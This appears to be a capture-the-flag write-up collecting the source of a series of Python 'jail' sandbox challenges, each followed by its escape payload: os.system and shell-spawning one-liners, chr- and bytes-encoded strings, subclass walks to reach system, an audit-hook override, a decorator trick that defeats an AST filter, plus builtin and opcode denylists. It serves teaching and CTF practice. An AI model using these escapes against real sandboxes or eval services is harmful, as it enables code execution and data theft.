| WELCOME = ''' |
| _ ______ _ _ _ _ |
| | | | ____| (_) | | (_) | |
| | |__ | |__ __ _ _ _ __ _ __ ___ _ __ | | __ _ _| | |
| | '_ \| __| / _` | | '_ \| '_ \ / _ \ '__| _ | |/ _` | | | |
| | |_) | |___| (_| | | | | | | | | __/ | | |__| | (_| | | | |
| |_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_| |
| __/ | |
| |___/ |
| ''' |
| |
# Show the banner and greeting, then evaluate one line read from stdin.
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
input_data = input("> ")
# The raw text goes straight to eval() with this module's globals and the
# full builtins, so nothing limits it to arithmetic. A calculator that must
# accept untrusted text needs a purpose-built expression parser (or
# ast.literal_eval for plain literals) rather than eval().
print('Answer: {}'.format(eval(input_data)))
| __import__('os').system('cat flag') |
| open('flag').read() |
def filter(s):
    """Return True if *s* contains a banned character.

    Banned: double quote, single quote, backtick, and the letters "i" and "b".
    The function name shadows the builtin filter() in this module.
    """
    # A character denylist limits how the input is spelled, not what it can
    # compute: text can still be assembled at run time from character codes,
    # which is what the encoded answer shown after this listing does.
    banned_chars = frozenset('"\'`ib')
    return not banned_chars.isdisjoint(s)
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | /_ | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| || | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || | |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ || | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_||_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
# Banner and greeting.
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
input_data = input("> ")
# filter() is the only gate in front of eval(); it inspects characters, not
# the meaning of the expression.
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))
| a = "__import__('os').system('cat flag')" |
| exp = "" |
| for i in a: |
| exp += f"chr({ord(i)})+" |
| print(f"eval({exp[:-1]})") |
| eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41)) |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ___ |
| | | (_) (_) (_) | | | | |__ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | ) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / / |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ |/ /_ |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
# Banner and greeting.
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
input_data = input("> ")
# Only the length of the first line is limited (at most 13 characters pass).
# A length cap does not bound what finally runs when the short expression
# can itself pull in more text, as the 13-character answer on this page does.
if 13 < len(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))
| eval(input()) |
| __import__("os").system("cat flag") |
# Notes from the challenge author: input is capped at 13 characters, some
# known answers are banned, and some unintended solutions are banned as well.
# Can you escape it? Good luck!

def filter(s):
    """Exit the process if *s* contains a banned builtin name.

    The substrings "exec", "input" and "eval" are checked in that order. On
    the first hit the rejected name is printed and exit(0) is called; when
    nothing matches the function returns None.
    """
    # Substring denylist: only these three names are refused, so every other
    # builtin stays callable from the evaluated expression.
    hit = next((word for word in ("exec", "input", "eval") if word in s), None)
    if hit is not None:
        print(f'{hit!r} has been banned for security reasons')
        exit(0)
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ___ _____ |
| | | (_) (_) (_) | | | |__ \ | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | ) | | |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ | / / |___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |/ /_ _ ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
# Banner and greeting.
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
input_data = input("> ")
# Two gates before eval(): the name denylist (which exits on a hit) and the
# 13-character cap. Builtins that are not on the denylist and fit in the cap
# are still evaluated, which is what the answer after this listing relies on.
filter(input_data)
if 13 < len(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))
| breakpoint() |
| __import__('os').system('cat flag') |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ____ |
| | | (_) (_) (_) | | | | |___ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | __) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ ||__ < |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ |___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
print(WELCOME)
# Notes from the challenge author: input longer than 7 characters is
# rejected and some known answers are banned. Can you escape it? Good luck!
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
input_data = input("> ")
# The length cap is the only check in this listing; anything of 7 characters
# or fewer is passed to eval() with the full builtins.
if 7 < len(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(eval(input_data)))
| |
| |
# Names removed from the builtins namespace before any input is read.
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr']
# eval is kept under another module-level name so the jail itself can still
# call it after the builtin name is gone.
eval_func = eval
for m in BANLIST:
    __builtins__.__dict__.pop(m)
del __loader__
del __builtins__
# A denylist has to name every dangerous builtin to be effective. This one
# leaves file access (open) and bytes in place, which is what the answer
# shown after this listing uses.
def filter(s):
    """Return True if *s* contains a double quote, single quote or backtick.

    The banned set is printed on every call. The function name shadows the
    builtin filter() in this module.
    """
    not_allowed = set('"\'`')
    print(not_allowed)
    # Banning quote characters stops string literals only; strings can still
    # be produced by other expressions.
    return not not_allowed.isdisjoint(s)
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ |
| | | (_) (_) (_) | | | | | || | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    sep="\n",
)
# Prompt forever; any Exception raised while reading or evaluating is printed
# and the loop continues.
while True:
    try:
        input_data = input("> ")
        # NOTE(review): as this listing reads, a filter hit only prints the
        # message and evaluation still follows. The page lost the original
        # indentation, so confirm against the challenge file whether an
        # exit/continue belongs here.
        if filter(input_data):
            print("Oh hacker!")
        print('Answer: {}'.format(eval_func(input_data)))
    except Exception as e:
        print(e)
| open(bytes([46, 47, 102, 108, 97, 103]).decode()).read() # ./flag |
# Names removed from the builtins namespace before any input is read.
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr', 'input','locals','globals']

# eval and input stay reachable for the jail itself under module-level
# aliases with hard-to-guess names.
my_eval_func_0002321 = eval
my_input_func_2309121 = input

for m in BANLIST:
    __builtins__.__dict__.pop(m)

del __loader__
del __builtins__
# open and bytes are still not on the list, so the answer from the previous
# level applies here unchanged (it is repeated after this listing).
| |
def filter(s):
    """Return True if *s* contains a double quote, single quote or backtick.

    The function name shadows the builtin filter() in this module.
    """
    # Quote characters are the only thing inspected; the meaning of the
    # expression is not.
    quote_chars = frozenset('"\'`')
    return not quote_chars.isdisjoint(s)
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ ___ _____ |
| | | (_) (_) (_) | | | | | || | / _ \ | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_| | | || |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| | | ||___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_| |_| | ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)\___(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    "Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals and `,\",' Good luck!",
    sep="\n",
)
# input and eval were deleted from builtins above, so the jail calls them
# through the aliases it saved first.
input_data = my_input_func_2309121("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(my_eval_func_0002321(input_data)))
| open(bytes([46, 47, 102, 108, 97, 103]).decode()).read() |
| Answer: |
| |
# Names removed from the builtins namespace; bytes is added at this level.
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes']
# The saved aliases are ordinary module globals. Evaluated code runs in this
# same module namespace, so it can call them by name once the name is known,
# as the first answer after this listing shows.
my_eval_func_ABDC8732 = eval
my_input_func_001EC9GP = input
for m in BANLIST:
    __builtins__.__dict__.pop(m)
del __loader__
del __builtins__
def filter(s):
    """Return True if *s* contains a double quote, single quote or backtick.

    The function name shadows the builtin filter() in this module.
    """
    # Only quote characters are screened; identifiers, calls and attribute
    # access pass through untouched.
    quote_chars = frozenset('"\'`')
    return not quote_chars.isdisjoint(s)
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | | || |/_ | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_| | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| | |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_| | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
print(WELCOME)
print(
    "Welcome to the python jail",
    "Let's have an beginner jail of calc",
    "Enter your expression and I will evaluate it for you.",
    "Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes and `,\",' Good luck!",
    sep="\n",
)
# The jail reads and evaluates through the aliases saved before the builtin
# names were deleted.
input_data = my_input_func_001EC9GP("> ")
if filter(input_data):
    print("Oh hacker!")
    exit(0)
print('Answer: {}'.format(my_eval_func_ABDC8732(input_data)))
| my_eval_func_ABDC8732(my_input_func_001EC9GP()) |
| ().__class__.__base__.__subclasses__()[137].__init__.__globals__['system']("sh") |
| cat f* |
# Names removed from the builtins namespace; type and open are added here.
BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes','type','open']

my_eval_func_002EFCDB = eval
my_input_func_000FDCAB = input

for m in BANLIST:
    __builtins__.__dict__.pop(m)

del __loader__
del __builtins__
# Deleting names removes the names, not the objects behind them: classes and
# functions remain reachable through the attributes of any live object, which
# is the route the answer after this listing takes.
| |
def filter(s):
    """Return True if *s* contains a quote character, a backtick or "+".

    The function name shadows the builtin filter() in this module.
    """
    # "+" is banned in addition to the three quote characters; everything
    # else in the expression is accepted as is.
    banned_chars = frozenset('"\'`+')
    return not banned_chars.isdisjoint(s)
| |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ ____ |
| | | (_) (_) (_) | | | | | || | |___ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_ __) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _||__ < |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_ ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes,open,type and `,\",',+ Good luck!") |
| input_data = my_input_func_000FDCAB("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(my_eval_func_002EFCDB(input_data))) |
| |
| if __name__ == '__main__': |
| main() |
| ().__class__.__base__.__subclasses__()[-4].__init__.__globals__[[i for i in ().__class__.__base__.__subclasses__()[-4].__init__.__globals__].pop(47)](().__class__.__base__.__subclasses__()[6]([99, 97, 116, 32, 42]).decode()) |
| #It's an challenge for jaillevel5 let's read your flag! |
| import load_flag |
| flag = load_flag.get_flag() |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _____ |
| | | (_) (_) (_) | | | | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| print(WELCOME) |
| print("It's so easy challenge!") |
| print("Seems flag into the dir()") |
| repl() |
def repl():
    """Read one line from stdin and execute it as a single interactive statement.

    The code runs with a fresh globals dict whose only entry is ``my_flag``,
    bound to the module-level ``flag`` object.
    """
    # The dict has no '__builtins__' key, so exec() supplies the normal
    # builtins; the executed statement is unrestricted apart from starting
    # with an otherwise empty namespace.
    my_global_dict = {'my_flag': flag}
    complie_code = compile(input("> "), '<string>', 'single')
    exec(complie_code, my_global_dict)
| if __name__ == '__main__': |
| main() |
class secert_flag(str):
    """A str subclass whose repr() and str() both return "DELETED".

    Only the two display methods are overridden. The underlying string data
    is untouched, so every other str operation (iteration, join, index,
    slicing, ...) still works on the real value; masking the printed form
    does not protect the content.
    """

    def __repr__(self) -> str:
        return "DELETED"

    # str() shares the masked representation.
    __str__ = __repr__
class flag_level5:
    """Holder object exposing the flag as a masked string attribute."""

    def __init__(self, flag: str):
        # The attribute has the same name as the class; its value is a
        # secert_flag, which hides the text from repr()/str() only.
        self.flag_level5 = secert_flag(flag)
def get_flag():
    """Read the file named 'flag' in the working directory and wrap it in flag_level5."""
    with open('flag') as f:
        contents = f.read()
    return flag_level5(contents)
| ''.join(my_flag.flag_level5) |
| NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a} |
| breakpoint() |
| __import__('os').system('cat *') |
| flag=NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a} |
| my_flag.flag_level5.index('NSSCTF{*') |
| import sys |
| |
def my_audit_hook(my_event, _):
    """Audit hook: raise RuntimeError for any event that is not on the allowlist.

    Allowed events are 'builtins.input', 'builtins.input/result', 'exec' and
    'compile'. The second hook argument is ignored.
    """
    # The allowlist is rebuilt on every event by calling the name `set`, which
    # is looked up at call time. The check is therefore only as trustworthy as
    # that name; binding the allowlist once at import time (a module-level
    # frozenset) would remove the dependency.
    permitted = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
    if my_event in permitted:
        return
    raise RuntimeError('Operation not permitted: {}'.format(my_event))
| |
def my_input():
    """Run a read-compile-exec loop over stdin until end of input.

    Every non-empty line is compiled in 'single' mode and executed in one
    globals dict shared by the whole session. Syntax errors and exceptions
    raised by the executed code are printed and the loop continues.
    """
    # No '__builtins__' entry is set, so exec() supplies the normal builtins;
    # the audit hook installed by the caller is the only restriction.
    dict_global = {}
    while True:
        try:
            input_data = input("> ")
        except EOFError:
            print()
            break
        except KeyboardInterrupt:
            # Ctrl-C prints a farewell but keeps the session open.
            print('bye~~')
            continue
        if not input_data:
            continue
        try:
            complie_code = compile(input_data, '<string>', 'single')
        except SyntaxError as err:
            print(err)
        else:
            try:
                exec(complie_code, dict_global)
            except Exception as err:
                print(err)
| |
| |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | | / / |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| |/ /_ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | '_ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | (_) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|\___/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| CODE = ''' |
| dict_global = dict() |
| while True: |
| try: |
| input_data = input("> ") |
| except EOFError: |
| print() |
| break |
| except KeyboardInterrupt: |
| print('bye~~') |
| continue |
| if input_data == '': |
| continue |
| try: |
| complie_code = compile(input_data, '<string>', 'single') |
| except SyntaxError as err: |
| print(err) |
| continue |
| try: |
| exec(complie_code, dict_global) |
| except Exception as err: |
| print(err) |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("White list of audit hook ===> builtins.input,builtins.input/result,exec,compile") |
| print("Some code of python jail:") |
| print(CODE) |
| my_input() |
| |
| if __name__ == "__main__": |
| sys.addaudithook(my_audit_hook) |
| main() |
| __builtins__["__loader__"].load_module("_posixsubprocess").fork_exec([b"/usr/bin/cat", "flag"], [b"/usr/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__builtins__["__loader__"].load_module('os').pipe()), False, False, None, None, None, -1, None) |
| exec("globals()['__builtins__'].set=lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']\nimport os\nos.system('cat flag')") |
| import ast |
| import sys |
| import os |
| |
| WELCOME = ''' |
| |
| _ _ _ _ _ _ _ ______ |
| (_) (_) | | | (_) | | | |____ | |
| _ __ _ _| | | |__ ___ __ _ _ _ __ _ __ ___ _ __ | | _____ _____| | / / |
| | |/ _` | | | | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _ \ \ / / _ \ | / / |
| | | (_| | | | | |_) | __/ (_| | | | | | | | | __/ | | | __/\ V / __/ | / / |
| | |\__,_|_|_| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| |_|\___| \_/ \___|_|/_/ |
| _/ | __/ | |
| |__/ |___/ |
| |
| ''' |
| |
def verify_ast_secure(m):
    """Return False if the AST *m* contains a banned node type, else True.

    Banned: Import, ImportFrom, Call, Expr, Add, Lambda, FunctionDef,
    AsyncFunctionDef, Sub, Mult, Div and Del. The first banned node found is
    reported on stdout.
    """
    # This is a denylist over node types. Node types that are not listed
    # (class definitions and their decorators, for example) are accepted, and
    # applying a decorator invokes a callable without any Call node in the
    # tree; the sample input after this listing is built from exactly those.
    # An allowlist of the few node types a calculator needs is the sturdier
    # design.
    banned_nodes = (
        ast.Import, ast.ImportFrom, ast.Call, ast.Expr, ast.Add, ast.Lambda,
        ast.FunctionDef, ast.AsyncFunctionDef, ast.Sub, ast.Mult, ast.Div,
        ast.Del,
    )
    for x in ast.walk(m):
        if type(x) in banned_nodes:
            print(f"ERROR: Banned statement {x}")
            return False
    return True
| |
| |
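def exexute_code(my_source_code):
    """Read submitted source from stdin, vet its AST, and execute it if it passes.

    Lines are appended to *my_source_code* until a line starting with
    "--HNCTF" arrives (the test is startswith, so the terminator does not have
    to be alone on its line) or stdin reaches end of input. The collected
    source is parsed to an AST and handed to verify_ast_secure(); only when
    that returns True is the source compiled again and executed. The function
    then waits for one more line before returning.

    A SyntaxError raised by either compile() call is not caught here.
    """
    print("Pls input your code: (last line must contain only --HNCTF)")
    while True:
        line = sys.stdin.readline()
        # readline() returns '' at end of input. Without this check a client
        # that disconnects before sending the terminator leaves the loop
        # spinning forever.
        if not line or line.startswith("--HNCTF"):
            break
        my_source_code += line

    tree_check = compile(my_source_code, "input_code.py", 'exec', flags=ast.PyCF_ONLY_AST)
    if verify_ast_secure(tree_check):
        print("check is passed!now the result is:")
        compiled_code = compile(my_source_code, "input_code.py", 'exec')
        # exec() is called without an explicit namespace, so the submitted
        # code runs against this module's globals and this function's locals.
        exec(compiled_code)
    print("Press any key to continue")
    sys.stdin.readline()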
| |
| |
# Menu loop: redraw the screen, read one option, dispatch on its first letter.
while True:
    os.system("clear")
    print(WELCOME)
    print("=================================================================================================")
    print("== Welcome to the calc jail beginner level7,It's AST challenge ==")
    print("== Menu list: ==")
    print("== [G]et the blacklist AST ==")
    print("== [E]xecute the python code ==")
    print("== [Q]uit jail challenge ==")
    print("=================================================================================================")
    ans = sys.stdin.readline().strip().lower()
    match ans:
        case 'g':
            # Show the banned AST node types, then wait for a line.
            print("=================================================================================================")
            print("== Black List AST: ==")
            print("== 'Import,ImportFrom,Call,Expr,Add,Lambda,FunctionDef,AsyncFunctionDef ==")
            print("== Sub,Mult,Div,Del' ==")
            print("=================================================================================================")
            print("Press any key to continue")
            sys.stdin.readline()
        case 'e':
            my_source_code = ""
            exexute_code(my_source_code)
        case 'q':
            print("Bye")
            quit()
        case _:
            # Anything else, including an empty line at end of input, ends
            # the program.
            print("Unknown options!")
            quit()
| @exec |
| @input |
| class A: |
| pass |
| --HNCTF |
| |
| __import__('os').system('cat flag') |
| import os |
| import sys |
| import traceback |
| import pwnlib.util.safeeval as safeeval |
| |
| |
# Opcode names needed to build constants and container literals.
_const_codes = [
    'POP_TOP', 'ROT_TWO', 'ROT_THREE', 'ROT_FOUR', 'DUP_TOP',
    'BUILD_LIST', 'BUILD_MAP', 'BUILD_TUPLE', 'BUILD_SET',
    'BUILD_CONST_KEY_MAP', 'BUILD_STRING',
    'LOAD_CONST', 'RETURN_VALUE', 'STORE_SUBSCR', 'STORE_MAP',
    'LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE', 'DICT_UPDATE', 'DICT_MERGE',
]

# The constant opcodes plus unary and binary arithmetic.
_expr_codes = [
    *_const_codes,
    'UNARY_POSITIVE', 'UNARY_NEGATIVE', 'UNARY_NOT',
    'UNARY_INVERT', 'BINARY_POWER', 'BINARY_MULTIPLY',
    'BINARY_DIVIDE', 'BINARY_FLOOR_DIVIDE', 'BINARY_TRUE_DIVIDE',
    'BINARY_MODULO', 'BINARY_ADD', 'BINARY_SUBTRACT',
    'BINARY_LSHIFT', 'BINARY_RSHIFT', 'BINARY_AND', 'BINARY_XOR',
    'BINARY_OR',
]

# NOTE(review): despite the name, this list is handed to safeeval.test_expr()
# as its second argument, which pwntools documents as the opcodes that are
# allowed. Read that way it is an allowlist that adds MAKE_FUNCTION and
# CALL_FUNCTION to the arithmetic set, i.e. defining and calling functions is
# permitted. Confirm against the pwntools version in use.
blocklist_codes = [*_expr_codes, 'MAKE_FUNCTION', 'CALL_FUNCTION']
| |
| TURING_PROTECT_SAFE = True |
| |
| banned = ''' |
| [ |
| 'POP_TOP','ROT_TWO','ROT_THREE','ROT_FOUR','DUP_TOP', |
| 'BUILD_LIST','BUILD_MAP','BUILD_TUPLE','BUILD_SET', |
| 'BUILD_CONST_KEY_MAP', 'BUILD_STRING','LOAD_CONST','RETURN_VALUE', |
| 'STORE_SUBSCR', 'STORE_MAP','LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE', |
| 'DICT_UPDATE', 'DICT_MERGE','UNARY_POSITIVE','UNARY_NEGATIVE','UNARY_NOT', |
| 'UNARY_INVERT','BINARY_POWER','BINARY_MULTIPLY','BINARY_DIVIDE','BINARY_FLOOR_DIVIDE', |
| 'BINARY_TRUE_DIVIDE','BINARY_MODULO','BINARY_ADD','BINARY_SUBTRACT','BINARY_LSHIFT', |
| 'BINARY_RSHIFT','BINARY_AND','BINARY_XOR','BINARY_OR','MAKE_FUNCTION', 'CALL_FUNCTION' |
| ] |
| ''' |
| |
| code = ''' |
| import os |
| import sys |
| import traceback |
| import pwnlib.util.safeeval as safeeval |
| input_data = input('> ') |
| print(expr(input_data)) |
| def expr(n): |
| if TURING_PROTECT_SAFE: |
| m = safeeval.test_expr(n, blocklist_codes) |
| return eval(m) |
| else: |
| return safeeval.expr(n) |
| ''' |
| |
| WELCOME = ''' |
| ______ __ _ |
| ____ | ____| / _| | | |
| ___ / __ \| |__ ___ ___ __ _| |_ ___ _____ ____ _| | |
| / __|/ / _` | __/ _ \ / __|/ _` | _/ _ \/ _ \ \ / / _` | | |
| \__ \ | (_| | | | __/ \__ \ (_| | || __/ __/\ V / (_| | | |
| |___/\ \__,_|_| \___| |___/\__,_|_| \___|\___| \_/ \__,_|_| |
| \____/ |
| ''' |
| |
| |
def expr(n):
    """Evaluate the expression string *n* and return its value.

    With TURING_PROTECT_SAFE set, *n* is first checked by
    safeeval.test_expr() against blocklist_codes and the result of that check
    is passed to eval(). Otherwise safeeval.expr() evaluates it directly.
    """
    if not TURING_PROTECT_SAFE:
        return safeeval.expr(n)
    # The opcode check is the only gate before eval(); what it admits is
    # decided entirely by the contents of blocklist_codes.
    m = safeeval.test_expr(n, blocklist_codes)
    return eval(m)
| |
# Print the banner, the mode, the opcode list and the code excerpt, then
# evaluate lines until stdin is exhausted.
try:
    print(WELCOME)
    print('Turing s@Fe mode:', 'on' if TURING_PROTECT_SAFE else 'off')
    print('Black List:', banned, 'some code:', code, sep='\n')
    while True:
        input_data = input('> ')
        try:
            print(expr(input_data))
        except Exception as err:
            # The full traceback is written to stdout. If stdout is the
            # client connection, file paths and source lines of the service
            # are disclosed with every failed expression.
            traceback.print_exc(file=sys.stdout)
except EOFError as input_data:
    print()
| (lambda: os.system('/bin/sh'))() |
| cat flag |
| WELCOME = ''' |
| _ _ ___ ___ _____ _ _ _ |
| | | | | / _ \ |__ \ |_ _| | | | | | |
| _ __ _ _| |_| |__ | | | |_ __ ) | | | _ __ _ __ | | | | |_ |
| | '_ \| | | | __| '_ \| | | | '_ \ / / | | | '_ \| '_ \| | | | __| |
| | |_) | |_| | |_| | | | |_| | | | |/ /_ _| |_| | | | |_) | |__| | |_ |
| | .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__| |
| | | __/ | | | |
| |_| |___/ |_| |
| ''' |
| |
# Python 2 source (print is a statement here).
print WELCOME
print "\n".join((
    "Welcome to the python jail",
    "But this program will repeat your messages",
))
# In Python 2, input() evaluates the typed text as an expression before
# returning it, so this "echo" program executes what the client sends.
# raw_input() is the Python 2 call that returns the text unchanged.
input_data = input("> ")
print input_data
| __import__("os").system('cat flag') |
| #it seems have a backdoor |
| #can u find the key of it and use the backdoor |
| |
| fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]" |
| |
def func():
    """Read one line, reject it if longer than 9 characters, else eval and print it.

    Any exception raised during evaluation or printing is swallowed. Always
    returns None.
    """
    code = input(">")
    # Nine characters is enough for a call that returns the module namespace,
    # as the transcript after this listing shows. The expression is evaluated
    # in the same module that holds the admin key, so the length cap does not
    # protect that secret.
    if len(code) > 9:
        print("you're hacker!")
        return None
    try:
        print(eval(code))
    except BaseException:
        pass
| |
def backdoor():
    """Ask for the admin key; on a match, eval one further line without a length limit.

    Exceptions from the evaluation are swallowed. A wrong key prints
    "Nooo!!!!".
    """
    print("Please enter the admin key")
    key = input(">")
    # The key is compared with a module-level variable. Anything that can
    # read this module's globals can read the key, so the secret should not
    # live in a namespace that evaluated input can reach.
    if key != fake_key_var_in_the_local_but_real_in_the_remote:
        print("Nooo!!!!")
        return
    code = input(">")
    try:
        print(eval(code))
    except BaseException:
        pass
| |
| WELCOME = ''' |
| _ _ _ _ _ _ |
| | | | | | | | | | | | | |
